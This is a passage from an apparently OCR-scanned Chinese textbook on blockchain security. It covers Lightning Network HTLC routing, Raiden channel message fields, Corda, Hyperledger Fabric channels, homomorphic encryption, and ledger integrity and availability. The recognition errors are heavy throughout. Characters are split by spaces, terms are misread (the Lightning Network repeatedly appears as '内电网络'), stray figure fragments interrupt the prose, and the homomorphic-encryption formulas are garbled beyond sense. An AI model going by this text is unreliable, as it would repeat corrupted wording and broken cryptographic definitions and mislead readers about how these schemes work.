动 不 得 的 ， 需 要 等 待 多 个 区 块 的 确认 也 是 不 能 触 碰 的 底线 ; 更 麻烦 的 是 ， 交 易 处 理 能 力 和 区 块 链 数据 容量 似乎 是 一 对 无 可 调和 的 矛盾 。 


思路 决定 出 路 ， 常 规 方法 找 不 到 出 路 ， 就 逼 得 社区 换 一 种 思路 考虑 这 个 问题 。 代 码 性 能 调 优 的 经 验 提示 我 们 ， 优 化 编译 、 改 进 算法 、 调 整数 据 结构 等 方式 虽然 很 重要 也 很 管用 ， 但 怎么 能 比 得 上 “ 根 
本 不 执行 ”的 强悍 ” 婚 然 在 比特 币 区 块 链 中 优化 性 能 如 此 艰难 ， 为 何不 尽 可 能 将 交易 放 到 链 外 执行 》 以 比特 币 区 块 链 为 后 盾 ， 在 链 下 实现 真正 的 点 对 点 微 支 付 交易 ， 区 块 链 处 理 能 力 的 瓶颈 可 能 会 被 彻底 
打破 ， 时 延 、 最 终 性 、 容 量 甚 至 隐私 问题 也 迎刃而解 ， 这 就 是 比特 币 “ 内 电网 络 ”的 思路 。 


闪电 网 络 并 不 试图 解决 单 次 支付 的 银 货 铝 付 问题 ， 其 假设 是 单 次 支付 的 金额 足够 小 ， 即 使 一 方 违约 另 一 方 的 损失 也 非常 小 ， 风 险 可 以 承受 。 因 此 使 用 时 必须 注意 “ 微 支付 ”这 个 前 提 。 多 人 少 资金 
算 “ 微 ”， 显 然 应 该 根据 业务 而 定 。 闪 电网 络 的 关键 技术 有 三 ， 依 次 是 RSMC (Recoverable Sequence Maturity Contract， 序 列 到 期 可 撤销 合约 ) 、HTLC (Hashed Timelock Contract， 哈 希 时 间 锁 
定 合约 ) 和 闪电 网 络 后 者 依赖 于 前 者 。 技 术 实现 虽然 复杂 ， 但 本 质 却 很 简单 。 


如 图 1-4 所 示 ，Alice 想 给 Dave 发 送 0.05BTC， 但 Alice 和 Dave 之 间 并 没有 微 支付 通道 。 没 关系 ，Alice 找 到 了 一 条 经 过 Bob、Carol 到 达 Dave 的 支付 路 径 ， 该 路 径 由 Alice/Bob、Bob/Carol 和 
Carol/Dave 3 个 微 支付 通道 串 接 而 成 。 


Step 1: Step 2: 
3 day 2 day 
lock 





图 1-4 闪电 网 络 的 支付 路 径 


Dave 生 成 一 个 秘密 R 并 将 Hash (R) 发 送 给 Alice，Alice 不 需要 知道 R。R 和 Hash (R) 的 作用 就 像 是 古代 调 兵 用 的 一 对 虎 符 。Alice 和 Bob 商 定 一 个 HTLC 合 约 : 只 要 Bob 能 在 3 天 内 向 Alice 出 示 哈 希 正 
确 的 R，Alice 便 支付 给 Bob 0.052BTC; 如 果 Bob 做 不 到 这 点 ， 这 笔 钱 3 天 后 将 自动 退还 Alice。 


Bob 和 Carol 商 定 一 个 HTLC 合 约 : 只 要 Caro| 能 在 2 天 内 向 Bob 出 示 哈 希 正 确 的 R，Bob 便 支付 给 Carol 0.051BTC; 如 果 Carol 做 不 到 这 点 ， 这 笔 钱 到 期 将 自动 退还 Bob。 
最 后 ，Carol 和 Dave 商 定 一 个 HTLC 人 合约: 只 要 Dave 能 在 1 天 内 向 Carol 出 示 哈 希 正 确 的 R，Carol 便 支付 给 Dave 0.05BTC; 如 果 Dave 做 不 到 这 点 ， 这 笔 钱 到 期 将 自动 退还 Carol。 


一 切 就 绪 后 ，Dave 及 时 向 Carol 披 露 R 并 拿 到 0.05BTC; 现在 Carol 知 道 了 R， 她 可 以 向 Bob 出 示 密 码 R 并 拿 到 0.051BTC (差额 部 分 的 0.001BTC 成 了 Carol 的 佣金 ) ; Bob 知 道 R 后 当然 会 向 Alice 出 示 并 
拿 到 他 的 那 份 0.052BTC， 差 额 部 分 的 0.001 BTC 成 了 Bob 的 佣金 ， 如 图 1-5 所 示 。 





day 2.5 day 1.3 


整个 过 程 很 容易 理解 。 最 终 效 果 是 Alice 支 付 了 0.052BTC，Dave 安 全 地 拿 到 0.05BTC， 整 个 闪电 支 付 网 络 为 此 收取 的 佣金 成 本 是 0.002BTC。 上 述 过 程 中 的 全 部 动作 都 发 生 在 比特 币 区 块 链 之 外 。 尽 管 
闪电 网 络 本 身 可 以 基于 任何 合适 的 传统 技术 构建 ， 闪 电网 络 的 支付 通道 也 可 能 逐渐 向 少数 大 型 中 介 集 中 ， 变 成 若干 大 型 中 介 彼 此 互 连 


、 普 通用 户 直 连 大 型 中 介 的 形式 ， 但 这 种 方案 仍然 具有 传统 中 心 化 方 
案 不 可 比拟 的 优势 ， 因 为 用 户 现在 并 不 需要 信任 中 介 ， 不 需要 在 中 介 处 存 钱 才 能 转移 支付 ， 资 金 安 全 受到 比特 币 区 块 链 的 充分 保护 。 


3. 雷 电网 络 


虽然 在 区 块 链 技术 途 过 发 展 的 今天 ， 比 特 币 日 益 显 得 腔 肿 和 老 旧 ， 但 比特 币 社区 仍然 为 区 块 链 技术 页 献 着 重要 的 思想 。 基 于 闪电 网 络 的 思路 ， 以 太 坊 社 区 也 提出 了 自己 的 链 下 微 支 付 通道 解决 方案 
一 一 雷电 网 络 (Raiden Network) 。 


Raiden 项 目 源码 托管 在 https://github.com/raiden-network/raiden， 开 发 语言 为 Python (目前 尚未 完成 ) ， 其 实施 原理 则 是 基于 《Universal Payment Channels》 一 文 。 当 我 们 将 以 太 坊 作为 一 
个 侧 链 导入 其 他 加 密 货币 之 后 ， 很 容易 依托 以 太 坊 智 能 合约 为 各 类 加 密 货币 开发 微 支付 通道 。 


Raiden 项 目的 思路 直接 继承 自 比 特 币 内 电网 络 ， 但 也 有 所 发 展 。 因 为 以 太 坊 智能 合 


约 对 报 文 格式 没有 特别 的 字段 限制 ， 使 得 Raiden 得 以 为 通道 余额 快照 引入 一 个 单 增 序号 ， 极 为 轻松 、 自 然 地 解决 了 
旧版 本 快照 的 识别 和 作废 问题 。 


首先 要 在 以 太 坊 上 建 有 一 个 智能 合约 ， 由 智能 合约 处 理 下 文 提 到 的 OpenTransaction、UpdateTransaction 等 指令 。 下 面 是 Raiden 建 立交 


< 于 J 明 ~ 。 


易 通 道 的 主要 形式 。 


Opening Transaction: 
Party 1: Public key or other signature verification informa 
the participants // 参与 者 之 一 的 公 钥 或 其 他 签名 验证 信 
Party2: Public key or other signature verification Information for the other 
participants // 其 他 参与 者 的 公 钥 或 其 他 签名 验证 信息 
Amount 1: The amount of money that Party 1 has placed in the channel // 第 一 
方 渠道 中 的 金额 
Amount 2: The amount of money that Party 2 has placed in the channel // 第 二 
方 渠道 中 的 金额 
Signature 1: Party 1’s siqnature on Opening Transaction // 第 一 方 在 开盘 交易 中 的 签名 
Signature 1: Party 2’s signature on Opening Transaction // 第 二 方 在 开盘 交易 中 的 签名 
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和 闪电 网 络 一 样 ， 双 方 需要 在 以 太 坊 区 块 链 上 开设 通道 并 各 自 锁定 以 太 币 。 这 


步 动作 可 通过 向 Raiden 智 能 合约 发 送 一 条 双方 签名 认可 的 报 文 来 实现 。 报 文中 的 关键 信息 包括 双方 公 钥 、 冯 方 锁定 资产 
数量 、 双 方 签名 。 


此 后 的 任何 支付 动作 都 可 以 发 生 在 以 太 坊 区 块 链 外 ， 参 与 双方 只 需要 私下 传递 一 系列 报 文 。 其 中 最 重要 的 报 文 是 UpdateTransaction (更 新 交易 通道 ) ， 其 形式 如 下 。 


Update Transaction: 
Sequence Number: This number is incremented with each new Update Transaction 
// 这 个 数字 随 着 每 个 ji 交易 更 新 而 递增 
Net Transaction Amount: The amount of money to transfer from Party 1 to Party 
2 (can be negative) // 从 第 一 方 转 到 第 二 方 的 金额 (可 以 是 负数 ) 
Hold Period: An amount of time (or number of blocks) to wait before closing 
the channel and transferring funds, after an Update Transaction has been posted 


// 在 交易 更 新 发 布 后 ， 在 关闭 通道 和 转移 资金 之 前 等 待 的 时 间 〈 或 块 数 ) 








































































































Conditions 
1: 
Function (argument) : Takes an argument and returns a number between 1 and 0 
// 接受 一 个 参数 并 在 1 一 0 之 间 返 回 一 个 数字 
Conditional Transaction Amount: Multiply this by the number returned by the 


Function and aqq it to the channel’s Net Transaction Amount // 通过 函数 返 世 
的 次 数 将 其 相 乘 ， 并 将 其 添加 到 信道 的 交易 量 ! 




































































2 
Signature 1: Party 1’s signature on Update Transaction // 第 一 方 交易 签名 
Signature 2: Party 27s signature on Update Transaction // 第 二 方 交 易 签 名 








此 报 文 的 内 容 几乎 就 是 内 电网 络 的 通道 余额 分 配方 案 的 翻版 ， 只 有 如 下 几 处 细微 的 差别 。 


一 是 增加 了 Sequence Number 字段 和 Hold Period 字 段 以 便 识 别 作 废 的 报 文 。A 如 果 向 区 块 链 上 合约 提交 一 个 双方 签字 的 UpdateTransaction 报 文 ， 合 约 将 等 待 Hold Period 时 间 。 期 间 如 果 对 方 B 能 


够 提交 一 个 Sequence Number 更 高 的 UpdateTransaction 报 文 ， 合 约 将 没收 A 质押 在 通道 中 的 全 部 资产 并 转移 给 B。 如 果 直 至 等 待 超 时 B 也 没有 异议 ,合约 将 按照 报 文 内 容 在 区 块 链 上 完成 转移 支付 并 关 
闭 通道 。 


二 是 通过 Net Transfer Amount 隐 含 余 额 分 配 的 方式 和 闪电 网 络 略 有 不 同 ， 这 里 是 从 建立 通道 时 声明 的 Amount 1 中 扣 减 Net Transfer Amount， 再 将 之 加 到 Amount 2 上 。 和 直接 声明 余额 比 ， 只 是 
形式 上 的 差别 。 


三 是 雷电 中 引入 了 较 HTLC 更 为 通用 的 Smart Condition。Smart Condition 表 现 为 一 个 可 在 区 块 链 上 执行 的 函数 Function (argument) ， 可 接受 任何 格式 的 报 文 为 参数 ， 执 行 后 返回 一 个 [0，1] 
之 间 的 数 。 将 其 返回 值 乘 以 配套 的 Condition Transfer Amount， 再 加 到 Net Transfer Amount 上 去 ， 就 完成 了 条 件 支付 引发 的 余额 调整 。| 闪 电网 络 中 的 所 谓 Hash Lock， 现 在 成 了 Smart Condition 的 
一 个 特例 。Smart Condition 能 够 提供 远 较 哈 希 校 验 丰 富 的 功能 ， 比 如 可 以 根据 某 类 Oracle 提 供 的 道琼斯 指数 值 完 成 衍生 品 合约 的 自动 执行 。 


当 发 生 和 争议 时 ， 只 需 向 区 块 链 上 智能 合约 出 示 最 新 版 本 的 UpdateTransaction 报 文 ， 并 请 求 智能 合约 对 报 文中 的 Smart Condition 予 以 处 理 ， 就 可 以 强制 执行 合约 。 如 果 没 有 争议 ， 以 上 这 一 切 都 不 
会 出 现在 以 太 坊 区 块 链 上 。 这 样 既 增 强 了 隐私 ， 又 提升 了 性 能 。 


其 他 设计 思路 ， 如 通过 多 跳 打 通 微 支付 通道 、 接 收 方 提交 适当 的 Argument 作 为 提 款 凭证 等 都 和 闪电 网 络 类 似 。 


Vitalik Buterin 最 近 提 及 的 State Channel 技 术 ， 本 质 上 也 和 这 里 介绍 的 一 样 ， 谷 将 区 块 链 作为 争议 仲裁 及 强制 执行 的 最 后 手段 ， 平 时 则 尽力 避免 信息 在 链 上 公开 。 
4. 带 给 Corda 的 启发 

R3 CEV 的 首席 技术 官 Richard Brown 之 前 在 博客 中 披露 了 Corda 的 主要 特点 。 

@ 没 有 多 余 的 全 局 数据 共享 ， 只 有 有 合法 需求 的 参与 方 可 以 按照 协议 获取 数据 。 

@Corda 的 编写 和 配置 在 企业 间 流 转 ， 无 中 心 控制 者 。 

@Corda 在 企业 间 单 个 交易 水 平 达 成 共识 ， 而 不 是 在 系统 水 平 上 。 

@ 系 统 设计 直接 支持 监管 观察 员 节 点 。 

交易 直接 由 交易 双方 验证 ， 而 不 是 由 一 大 群 不 相干 的 验证 者 进行 。 

支持 多 种 共识 机 制 。 

@ 记 录 了 智能 合约 代码 和 人 类 语言 法 律 文件 的 清晰 联系 。 

图 用 行业 标准 工具 创建 。 

@ 没 有 原始 加 密 货币 。 


其 中 第 一 、 三 、 五 点 值得 注意 。 如 果 相 关 参 与 方 只 有 2 ~ 3 个 ， 根 据 计 算 机 科学 的 已 知 结论 ， 他 们 要 通过 远程 通信 达成 拜占庭 容错 的 共识 是 不 可 能 的 ， 这 也 是 为 何 目前 的 智能 合约 需要 向 足够 数量 的 验 
证 者 公开 的 重要 原因 。 那 么 Corda 是 怎么 做 到 这 点 的 ? 


Corda 当 然 有 可 能 在 其 核心 只 做 了 上 述 第 七 点 ， 即 通过 类 XBRL 的 语言 制订 了 一 种 电子 化 的 法 律 文件 模板 ， 然 后 双方 对 此 进行 电子 签名 后 就 结束 了 。 
5.Hyperledger Fabric 1.0 的 通道 


Hyperledger Fabric 1.0 的 通道 是 由 共识 服务 (Ordering) 提供 的 一 种 通信 机 制 ， 类 似 于 消息 系统 的 发 布 -订阅 (PUB/SUB) 中 的 Topic; 基于 这 种 发 布 -订阅 关系 ， 将 Peer 和 Orderer 连 接 在 一 起 ， 形 
成 一 个 个 具有 保密 性 的 通信 链 路 (虚拟 ) ， 实 现 了 业务 隔离 的 要 求 ; 通道 也 与 账本 (Ledger) -状态 (Worldstate) 紧密 相关 ， 如 图 1-6 所 示 。 
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channels 





共识 服务 与 (P1-PN) 、 (P1-P2-P3) 、 (P2-P3) 组 成 了 3 个 相互 独立 的 通道 ， 加 入 到 不 同 通道 的 Peer 节点 能 够 维护 各 个 通道 对 应 的 账本 和 状态 。 在 现实 世界 中 ， 对 应 的 就 是 不 同业 务 场 景 下 的 参 
与 方 ， 如 银行 、 保 险 公司 与 物流 企业 、 生 产 企业 等 实体 结构 。 我 们 可 以 看 到 通道 机 制 实 际 上 使 得 Fabric 建 模 实际 业务 流程 的 能 力 大 大 增强 了 ， 大 家 可 以 友 挥 想象 力 去 找寻 可 能 的 应 用 领域 。 


在 图 1-7 中 ，Peer 1、Peer 2 和 Peer N 订 阅 红色 通道 ， 并 共同 维护 红色 账本 ; Peer 1 和 Peer N 订 阅 蓝 色 通道 并 维护 蓝 色 账本 ; 类 似 地 ，Peer 2 和 Peer N 在 黑色 通道 上 并 维护 黑色 账本 。 
在 这 个 例子 中 ，Peer N 订 阅 了 所 有 通道 ,每 个 通道 都 有 一 个 相关 的 账本 。 一 般 来 说 ， 我 们 称 不 涉及 所 有 Peer 的 账本 为 子 账本 ; 相对 的 是 系统 账本 ， 即 全 账本 。 


通道 和 账本 的 组 合 是 一 个 虚拟 链 系统 通道 和 全 账本 构成 系统 链 。 每 个 区 块 链 网 络 只 有 一 个 系统 链 。 如 果 交 易 是 公开 的 ， 区 块 链 网 络 可 能 永远 不 需要 多 个 链 ， 所 有 的 交易 对 所 有 Peers 成 员 都 可 见 。 然 
而 ， 在 成 员 间 进行 私密 交易 (例如 双边 合同 ) 时 ， 单 独 的 链 是 隔离 数据 、 提 供 保密 的 较 好 方式 。Fabric 的 通道 与 办 电网 络 、 雷 电网 络 的 不 同 之 外 ， 是 Fabric 的 通道 基于 Pub/Sub 消 息 模型 ， 可 以 容许 多 个 
参与 者 ， 而 内 电网 络 和 雷电 网 络 目前 只 容许 两 个 参与 者 。 


Fabric 的 通道 与 内 电网 络 、 雷 电网 络 的 相同 之 处 ， 是 大 家 都 有 通道 建立 、 通 道 运行 和 通道 关闭 的 生命 周期 。 


1.1.5 ” 同 态 加 密 


同 态 加 密 是 基于 数学 难题 的 计算 复杂 性 理论 的 密码 学 技术 。 对 经 过 同 态 加 密 的 数据 进行 处 理 得 到 一 个 输出 ， 将 这 一 输出 进行 解密 ， 其 结果 与 用 同一 方法 处 理 未 加 密 的 原始 数据 得 到 的 输出 结果 是 一 样 
的 。 


1. 同 态 加 密 的 相关 概念 


同 态 加 密 是 一 种 无 须 对 加 密 数 据 进行 提前 解密 就 可 以 执行 计算 的 方法 。 使 用 同 态 加 密 技术 在 区 块 链 上 加 密 数 据 ， 不 会 对 区 块 链 属 性 造成 任何 重大 的 改变 。 也 就 是 说 ， 区 块 链 仍旧 是 公有 区 块 链 ， 然 而 
区 块 链 上 的 数据 将 会 被 加 密 ， 因 此 照顾 到 了 公有 区 块 链 的 隐私 问题 ， 实 现 与 私有 区 块 链 一 样 的 隐私 效果 。 


同 态 加 密 的 思想 起 源 于 私密 同 态 ， 代 数 同 态 和 算术 同 态 是 私密 同 态 的 子 集 。R 和 9? 是 域 ， 称 加 密 函 数 E: R 一 9 为 : 
“加 法 同 态 ， 如 果 存 在 有 效 算 法 ，EG+J=EG e 忆 (9) 或 者 x+y=D(EGC9 @ E(y)) 成 立 ， 并 且 不 泄漏 x 和 y; 

` 乘法 同 态 ， 如 果 存 在 有 效 算 法 ，EGXJ=EGOE() 或 者 xy=DGE(GOE()) 成 立 ， 并 且 不 泄漏 zx 和 yi 

. 混合 乘法 同 态 ， 如 果 存 在 有 效 算法 ，EGX 妨 =EG9y 或 者 xy=D(EO 喉 成立， 并 且 不 泄漏 x; 

减法 同 态 ， 如 果 存 在 有 效 算法 ，E(x-y)=E(x)O-E(y) 或 者 x-y=D(E(x)O-E(y)) 成 立 ， 并 且 不 泄漏 x 和 y; 

` 除法 同 态 ， 如 果 存 在 有 效 算 法 ，E(x/y)=E(x)O 〇 /EQy) 或 者 x/y=D(E(x)O 〇 /EQ)) 成 立 ， 并 且 不 泄漏 x 和 y; 

. 代数 同 态 ， 如 果 孔 既是 加 法 同 态 又 是 乘法 同 态 ; 


` 算术 同 态 ， 如 果 已 同时 为 加 法 同 态 、 减 法 同 态 、 乘 法 同 态 和 除法 同 态 。 
2. 同 态 加 密 的 优势 


同 态 加 密 技术 不 仅 提 供 了 隐私 保护 ， 它 同样 允许 随时 访问 公有 区 块 链 上 的 加 密 数据 进行 审计 用 于 或 其 他 目的 。 换 名 话说， 使 用 同 态 加 密 在 公有 区 块 链 上 存储 数据 将 能 够 同时 提供 公有 区 块 链 和 私有 区 
块 链 最 好 的 部 分 。 比 如 ， 使 用 同 态 加 密 的 以 太 坊 智能 合约 能 够 提供 相似 的 特点 和 更 强 的 掌控 ， 同 时 完整 地 保留 以 太 坊 的 优点 。 


在 Shield128 区 块 链 安全 平台 上 ，Kobi Gurkan 提 到 了 一 个 同 态 加 密 在 区 块 链 上 的 应 用 案例 一 一 使 用 同 态 加 密 ， 以 太 坊 智能 合约 能 够 用 于 管理 员工 开 文 。 在 这 个 案例 中 ， 如 果 员 工 不 想 让 其 同行 知道 他 
们 的 开支 ， 那 么 他 们 可 以 加 密 其 开支 详细 信息 ， 然 后 发 送 到 智能 合约 上 。 经 过 加 密 的 开支 信息 会 被 算 入 总 开支 。 最 后 ， 当 公司 财务 部 门 想 要 分 析 开 支 时 ， 可 以 在 本 地 对 最 终 的 智能 合约 进行 解密 ,将 总 开 
支 详细 分 解 开 。 这 样 的 效果 与 公有 账本 相同 ， 但 是 只 有 最 终 机 构 能 够 看 到 开支 详细 信息 ， 其 他 的 用 户 则 只 能 看 到 一 些 加 密 的 条 目 。 


1.2 ”数据 完整 性 分 析 


完整 性 (Integrity) (或 者 说 数据 不 可 修改 性 ) 是 区 块 链 的 一 大 优点 。 确 定 交易 双方 身份 的 签名 (Signature) 、 共 识 (Consynsus) 、 数 据 上 链 和 时 间 戳 ， 四 者 组 成 了 一 套 完整 的 分 布 式 账本 链条 ， 
其 中 每 一 条 交易 记录 都 受到 密码 学 原理 保护 。 这 样 的 数据 结构 设计 为 区 块 链 带 来 了 数据 完整 性 。 


1.2.1 签名 与 验证 


在 区 块 链 中 ， 每 一 笔 交 易 或 每 一 次 对 区 块 链 状态 的 改变 都 需要 交易 或 者 状态 改变 的 发 起 者 用 其 私 钥 来 签名 。 


区 块 链 的 参与 节点 必须 用 发 起 者 的 公 钥 来 验证 签名 。 如 果 签 名 验证 没有 通过 ， 交 易 是 不 可 能 被 区 块 接受 的 。 从 数据 安全 的 角度 来 思考 ， 数 字 签 名 的 主要 作用 是 可 以 做 到 某 种 程度 的 不 可 抵赖 性 (Non 
Repudiation) 。 交 易 的 双方 都 需要 用 私 钥 对 交易 进行 签名 来 确认 ， 交 易 发 生 后 双方 就 不 能 抵赖 。 这 样 可 以 从 某 种 程度 上 保证 数据 的 完整 性 。 对 区 块 链 上 任何 数据 的 增加 [ 都 需要 交易 方 的 签名 ， 黑 客 也 就 
不 能 轻易 地 自 改 数据 ， 除 非 黑客 偷 到 交易 方 的 私 钥 。 


[1 注意 : 区 块 链 上 的 数据 是 不 能 修改 的 。 如 果 一 定 要 修改 ， 我 们 必须 增加 数据 来 指出 前 面 的 数据 什么 地 方 应 该 改 成 现在 增加 的 数据 。 


1.2.2 ”共识 机 制 


共识 机 制 是 对 一 个 时 间 窗 口内 的 交易 事务 或 者 状态 改变 的 先后 顺序 达成 共识 的 算法 。 区 块 链 上 任何 数据 的 增加 都 需要 遵循 共识 机 制 。 黑 客 也 许可 以 修改 革 几 个 区 块 链 节 点 的 数据 ， 但 是 除非 他 拥有 
51% 以 上 的 算 力 〈 比 特 币 网 络 ) 或 者 拥有 大 部 分 的 代 币 (以 太 坊 ) ， 否 则 复 改 数据 成 功 的 概率 趋 近 于 零 。 简 单 齐 ， 就 是 全 局 的 共识 一 定 能 够 战胜 局 部 的 纂 改 。 本 书 对 共识 算法 和 安全 机 制 有 非常 详细 的 分 
析 ， 这 里 只 是 简单 前 述 共识 机 制 对 数据 完整 性 的 积极 影响 。 


1.2.3 ”数据 上 链 


数据 上 链 就 是 数据 通过 共识 机 制 打包 在 一 个 区 块 成 为 一 个 新 的 区 块 ， 并 且 链 接 到 前 面 的 区 块 ， 成 为 链 上 不 可 修改 的 数据 。 以 比特 币 为 例 ， 新 的 区 块 在 挖 矿 过 程 中 产生 。 所 谓 挖 矿 ， 实 际 上 是 穷 举 随机 
数 算法 ， 把 上 个 区 块 的 哈 希 值 加 上 10 分 钟 内 的 全 部 交易 打包 ， 再 加 上 一 个 随机 数 ， 算 出 一 个 256 位 的 字符 串 哈 希 值 ， 输 入 的 随机 数 Nonce 使 哈 希 值 满足 一 定 条 件 就 获得 这 个 区 块 的 交易 记 账 权 。 新 产生 的 
区 块 需要 快速 广播 出 去 ,以便 其 他 节点 对 其 进行 验证 ， 以 防 造 假 。 每 个 区 块 存 储 着 上 一 个 区 块 的 哈 希 值 ， 可 以 一 直 追 溯 到 源头 ， 只 有 经 过 验证 后 才 最 终 获得 区 块 的 交易 记 账 权 。 比 特 币 系统 会 让 挖 矿 的 矿 
工 竞争 记 账 权 (在 主 链 上 链接 区 块 的 权利 ) ， 这 个 竞争 机 制 就 是 PoW 机 制 。 挖 矿 需 要 付出 大 量 的 能 源 和 时 间 ， 谁 付出 的 工作 量 多 ， 就 能 以 更 大 的 概率 获得 一 个 区 块 的 记 账 权 。 获 取 记 账 权 的 矿工 会 将 当前 
区 块 链接 到 前 一 区 块 ， 形 成 最 新 的 区 块 主 链 ， 而 该 矿工 也 会 得 到 系统 奖励 的 一 定数 量 的 比特 币 。 所 有 的 区 块 链接 在 一 起 ， 便 形成 了 区 块 链 的 主 链 。 从 创 世 区 块 到 当前 区 块 ， 在 区 块 链 之 上 的 所 有 数据 历史 
都 可 以 追溯 和 碍 询 到 。 这 样 数据 的 完整 性 在 数据 上 链 的 过 程 中 得 到 了 保障 。 


1.2.4 时 间 惟 


时 间 戳 是 指 从 格林 威 治 时 间 1970 年 1 月 1 日 00 时 00 分 00 秒 (北京 时 间 1970 年 1 月 1 日 08 时 00 分 00 秒 ) 起 至 某 一 时 刻 所 经 过 的 总 秒 数 。 它 通常 是 一 个 字符 序列 ， 用 以 唯一 地 标识 某 一 刻 的 时 间 。 在 比特 币 
系统 中 ， 获 得 记 账 权 的 节点 在 链接 区 块 时 需要 人 在 区 块头 中 加 其 时 间 戳 ， 用 于 记录 当前 区 块 数据 的 写 入 时 间 。 每 一 个 随后 区 块 中 的 时 间 戳 都 会 对 前 一 个 时 间 戳 进行 增强 ， 最 终 形 成 一 条 时 间 递 增 的 链条 。 如 
果 想 要 和 修改 记录 ， 那 么 修改 的 时 间 吉 会 打 乱 时 间 戳 递增 的 顺序 ， 从 而 无 法 实现 隐蔽 性 修改 的 目的 。 换 句 话说， 时 间 戳 有 利于 原始 记录 的 保存 ， 使 其 具有 不 可 修改 性 。 时 间 戳 技术 本 身 并 没有 多 复杂 ， 但 在 
区 块 链 技术 中 应 用 时 间 截 却 是 一 项 重大 的 创新 ， 它 为 未 来 基于 区 块 链 的 互联 网 和 大 数据 增加 了 一 个 时 间 维 度 ， 使 得 数据 更 容易 被 追溯 ， 重 现 历史 也 成 为 可 能 。 时 间 截 的 引入 解决 了 电子 数据 的 无 痕 修 改 问 
题 。 在 这 个 过 程 中 ， 操 作者 将 用 户 的 电子 数据 的 Hash 值 和 权威 时 间 源 绑 定 ， 再 由 国家 授时 中 心 负责 授时 和 守 时 。 在 此 基础 上 通过 时 间 戳 服务 中 心 的 加 密 设备 ， 产 生 不 可 伪造 的 时 间 戳 文件 ， 从 而 有 效 证 明 
电子 数据 的 完整 性 及 产生 时 间 。 由 于 时 间 戳 签发 工作 是 由 第 三 方 时 间 戳 服务 中 心 完成 的 ， 而 该 第 三 方 时 间 戳 服务 中 心 由 国家 授时 中 心 提供 时 间 授 时 和 守 时 保障 。 引 入 时 间 戳 作为 第 三 方 电子 鉴定 角色 ,， 产 
生 与 内 容 唯一 映射 的 Hash 值 (数字 指纹 ) ， 这 些 电 子 证 据 可 以 起 到 类 似 “ 公 证 ”的 作用 。 同 时 ， 时 间 戳 可 以 作为 存在 性 证 明 (Proof of Existence) 的 重要 参数 ， 它 能 够 证 实 特定 数据 必然 在 某 一 特定 时 
刻 是 的 确 存 在 的 。 这 保证 了 区 块 链 数据 库 是 不 可 自 改 和 不 可 伪造 的 ， 也 为 区 块 链 技术 应 用 于 公证 、 知 识 产 权 注 册 等 时 间 敏 感 领 域 提供 了 可 能 。 


1.2.5 ”开源 


大 部 分 公有 链 都 是 开源 的 ， 很 多 联盟 链 比如 R3 的 Corda、Hyperledger 的 Fabric、 国 内 BCOS， 都 是 开源 的 。 代 码 开源 对 完整 性 有 非常 积极 的 影响 。 首 先 ， 我 们 可 以 利用 诸如 
Safecode (http://www.safecode.org) 或 者 Synopsys (https://www.synopsys.com/) 这 样 的 工具 对 开源 代码 本 身 的 完整 性 进行 验证 管理 。 其 次 ， 我 们 可 以 利用 内 部 或 者 外 部 的 技术 力量 对 代码 进行 
模块 化 管理 ， 把 那些 对 区 块 链 数据 有 直接 影响 的 模块 分 离 出 来 ， 并 且 对 这 些 模块 进行 严格 的 审查 和 版 本 管理 ， 在 权限 设置 方面 ， 我 们 可 以 增加 身份 管理 以 及 访问 控制 的 措施 ， 进 一 步 加 强 对 区 块 链 数据 有 
直接 影响 模块 的 管理 ， 这 对 保障 模块 数据 完整 性 和 安全 性 具有 重要 作用 。 


1.3 可 用 性 


在 软件 系统 中 ， 可 用 性 (Availability) 定义 了 系统 功能 和 工作 时 间 的 比例 。 可 用 性 受到 系统 错误 、 基 础 设施 问题 恶意 攻击 和 系统 负载 的 影响 。 它 通常 以 正常 运行 时 间 的 百分比 来 衡量 。 或 者 简单 地 
说 ， 就 是 指 系统 的 性 能 。 如 何在 合理 的 时 间 内 响应 用 户 的 请 求 是 可 用 性 的 一 个 重要 指标 。 


区 块 链 由 于 有 多 备份 的 账本 ， 增 加 了 可 用 性 。 但 是 由 于 共识 机 制 (比如 比特 币 的 工作 量 证 明 ) 的 需要 ， 目 前 大 部 分 的 区 块 链 在 性 能 方面 与 中 心 化 的 软件 系统 还 是 有 差距 的 。 因 此 ， 区 块 链 在 可 用 性 方 
面相 较 保密 性 和 完整 性 需要 更 多 的 改进 。 


区 块 链 账 本 的 多 备份 是 一 柄 双 刃 剑 。 一 方面 ， 由 于 账本 存储 在 分 布 式 的 节点 上 ， 个 别 节 点 的 账本 被 自 改 或 丢失 不 会 对 可 用 性 有 大 的 影响 ; 另 一 方面 ， 由 于 数据 同步 和 共识 机 制 的 需要 ， 多 备份 影响 了 
性 能 。 现 在 比特 币 网 络 每 秒 只 能 处 理 3 笔 交 易 ( 即 3TPS (Transaction Per Second) ) ， 以 太 坊 目前 平均 是 10TPS 左 右 ，Hyperledger Fabric 大 概 是 200TPS。 比 较 支 付 宝 的 120000TPS， 区 块 链 的 性 能 和 
可 用 性 确实 需要 提高 。 


目前 区 块 链 的 扩容 方案 (Scaling Proposal) 的 目的 就 是 增强 性 能 和 可 用 性 。 比 如 ， 前 面 提 到 的 闪电 网 络 和 雷电 网 络 就 可 以 增强 区 块 链 的 可 用 性 。 虽 然 通常 认为 性 能 (Performance) 和 扩容 
(Scaling) 不 是 同义词 一 一 性 能 指 系统 处 理 请 求 过 程 的 反应 时 间 ， 而 可 扩容 性 指 系统 处 理 增 加 工作 量 的 能 力 。 而 扩容 能 力 可 以 影响 性 能 。 例 如 ， 比 特 币 已 经 成 为 各 种 问题 的 典型 范例 ， 特 别 是 当 网 络 不 能 
扩容 时 。 随 着 交易 的 大 规模 增长 ， 交 易 处 理 时 间 越 来 越 长 ， 成 本 越 来 越 高 。 





1.4 物理 安全 性 


如 果 把 比特 币 网 络 作为 原生 的 区 块 链 ， 那 么 原生 的 区 块 链 就 有 很 多 比较 好 的 安全 属性 。 从 P2P (点 对 点 ) 网 络 到 基于 工作 量 证 明 的 共识 机 制 ， 都 为 原生 区 块 链 网 络 的 安全 做 出 了 贡献 。 后 来 延伸 出 来 
的 竞争 区 块 链 ， 包 括 以 太 坊 、 零 币 、 新 经 济 币 和 联盟 链 的 开源 项 目 (如 Hyperledger Fabric、R3 Corda、BCOS 等 ) 都 对 安全 属性 做 了 补充 和 增强 。 


如 今 ， 物 联网 在 智慧 城市 、 建 筑 、 汽 车 、 医 疗 设备 等 领域 得 到 了 广泛 的 应 用 。 在 高 速 帮 展 的 同时 ， 安 全 问题 日 益 突出 。 物 理 安全 性 (Safety) 不 高 的 物 联 网 设备 和 应 用 程序 直接 威胁 到 人 身 的 安全 。 
